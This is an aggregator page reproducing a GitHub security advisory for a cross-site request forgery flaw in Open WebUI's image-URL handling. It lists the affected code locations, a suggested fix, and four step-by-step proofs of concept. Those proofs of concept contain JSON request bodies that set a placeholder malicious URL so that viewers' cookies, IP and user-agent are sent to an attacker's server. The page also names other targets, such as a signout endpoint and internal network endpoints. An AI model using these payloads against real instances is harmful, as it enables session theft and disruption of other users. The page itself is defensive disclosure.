What is GHSA-j6w6-986j-2m2m?

GHSA-j6w6-986j-2m2m is a security advisory published by GitHub Security Advisories with Medium severity. Open WebUI Vulnerable to Cross-Site Request Forgery (CSRF) via Image URL Manipulation

Which CVE IDs does GHSA-j6w6-986j-2m2m cover?

GHSA-j6w6-986j-2m2m covers the following CVE IDs: CVE-2026-45317. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

What is the CVSS v3 score of GHSA-j6w6-986j-2m2m?

GHSA-j6w6-986j-2m2m has a CVSS v3 base score of 4.6, published by GitHub Security Advisories.

Which products are affected by GHSA-j6w6-986j-2m2m?

GHSA-j6w6-986j-2m2m affects 1 product, including: pip/open-webui:\u003c= 0.9.2.

GHSA-j6w6-986j-2m2mMediumCVSS 4.6

Open WebUI Vulnerable to Cross-Site Request Forgery (CSRF) via Image URL Manipulation

Vendor

GitHub Security Advisories

Published

May 14, 2026

Last Modified

May 19, 2026

🔗 CVE IDs covered (1)

CVE-2026-45317 →

📋 Description

Summary

An application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions.

This can be exploited in various locations, including:

• Profile picture

• Model picture

• Hidden images in shared chats

• Images within shared notes

Details

Vulnerable Code:

This appears to occur in most locations where images can be uploaded/rendered. Here are found sinks:

Profile Image in chat

• Note: rendering profile picture in chat

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16Code

Profile Picture edit

• Note: Profile picture rendering in edit

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205

Profile Image Navbar

• Note: Profile picture rendering in navbar

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237

Profile Image UserList

• Note: rendering images in user list admin panel

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399

Images in chat

• Note: rendering images in chat

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35

Image in chat

• Note: Image sent in chat

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192 Model image in chat

• Note: Model image rendering in chat

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128

Model image in chat response

• Note: Model image rendering in the assistant response

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612

Model Image Admin settings

• Note: Model image rendering in the admin settings

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336

Model Image Workspace

• Note: Model image rendering in the workspace

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336

Model Image Edit

• Note: Model image rendering in the edit modal

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407

Image in Notes

• Note: Image rendering in shared note

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184

Root Cause

Insecure display of image

• Application is sending a GET request to the unvalidated image url

Lack of Input Validation

• Image url is not validated for filetype

PoCs

PoC (profile picture)

Environment

• Open-WebUl latest version (v0.6.41)

• Valid user

Step 1: Create a Malicious Link

• Set up a server to obtain victim's cookies, ip, referer, user-agent, etc

Step 2: Profile Image URL

Add user
Change the profile image url parameter to the malicious URL (server was used for PoC)
Example POST request:

Repeat action
1. Repeat for userSignUp, updateUserProfile, and update

Step 3: View Image on Victim Admin Account

Log into an admin account
Visit the admin panel (/admin/users/overview)
Notice the GET request sent to the malicious URL

Step 4: Verify User Information Is Sent

Confirm user information is sent

PoC (chat)

Environment

• Open-WebUl latest version (v0.6.41)

• Valid user

Step 1: Create a Malicious Link

• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc

Step 2: Start chat

Start chat
Send a message
Resend POST request
Resend post request to this endpoint /api/v1/chats/[chat_id_here]
Add in a file with type set to image and the url set to the malicious link
Replace models/ids/malicious_url_here with what is applicable
{"chat":{"models":["redacted"],"history":{"messages":{"id_here":{"id":"id_here","parentId":"id_here","childrenIds":["id_here"],"role":"user","content":"","files":[{"type":"image","url":"MALICIOUS_URL_HERE"}],"timestamp":1765978991,"models":["redacted"]}}},"params":{},"files":[]}}

Share chat
1. Copy link to share the chat

Step 3: View Image on Victim Account

Log into a valid account
Open the shared chat
Notice the GET request sent to the malicious URL from the hidden image on the page

Step 4: Verify User Information Is Sent

Confirm user information is sent

PoC (notes)

Environment

• Open WebUI latest version (v0.6.41)

• Valid user with access to notes

Step 1: Create a Malicious Link

• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc

Step 2: Create Note

Resend POST request to /api/v1/notes/[note_id_here]/update
Add in the malicious URL to a file
Example parameters

1. (replace the ID_HERE with valid ID and MALICIOUS_URL_HERE with the malicious URL):
1. {"title":"2025-12-17","data":{"files":[{"id":"ID_HERE","type":"image","url":"MALICIOUS_URL_HERE"}]},"access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}}}

Refresh page and notice the request being sent to the malicious URL
Share note and copy link

Step 5: View Note on Valid Account

Log into a valid account
Open the shared note
Notice the GET request sent to the malicious URL from the hidden image on the page

Step 6: Verify User Information Is Sent

Verify that user information is sent.

PoC (model)

Environment

• Open WebUI latest version (v0.6.41)

• Admin user

Step 1: Create a Malicious Link

• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc

Step 2: Create Model

Navigate to /workspace/models
Create or edit a model
Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id]
Change the profile_image_url to the malicious link
Example parameters:
{"id":"model_test","base_model_id":"redacted","name":"MODEL_TEST","meta":{"profile_image_url":"MALICIOUS_URL_HERE","description":null,"suggestion_prompts":null,"tags":[],"capabilities":{"vision":true,"file_upload":true,"web_search":true,"image_generation":true,"code_interpreter":true,"citations":true,"usage":false}},"params":{},"access_control":null}

Step 3: View Image on Valid Account

Log into a valid account
Create chat with the model
Notice a GET request is sent to the malicious url
All users starting a chat with that model will be vulnerable to the attack

Step 4: View Image on Admin Account

Navigate to /workspace/models
Notice GET request sent to malicious url

Step 5: Verify User Information Is Sent

On the set up server verify that improperly set cookies are sent, IP, user-agent, etc.

Other Attack Examples

Alternative malicious links
Signout of Open WebUI
- /api/v1/auths/signout
Internal network endpoints
Signout of other applications
Resource intensive endpoints
Etc

Recommended Fix

Store images
- Instead of sending a GET request to load the image each time, store the image and render on the page
Validate input
- Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc)

Impact

Vulnerability Type

CWE-352: Cross-Site Request Forgery (CSRF)
CWE-20: Improper Input Validation

Affected users

All authenticated users

The impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.

🎯 Affected products1

pip/open-webui:<= 0.9.2

🔗 CVE IDs covered (1)

📋 Description

Summary

Details

Vulnerable Code:

PoCs

PoC (profile picture)

PoC (chat)

PoC (notes)

PoC (model)

Other Attack Examples

Recommended Fix

Impact

Vulnerability Type

Affected users

🎯 Affected products1

🔗 References (4)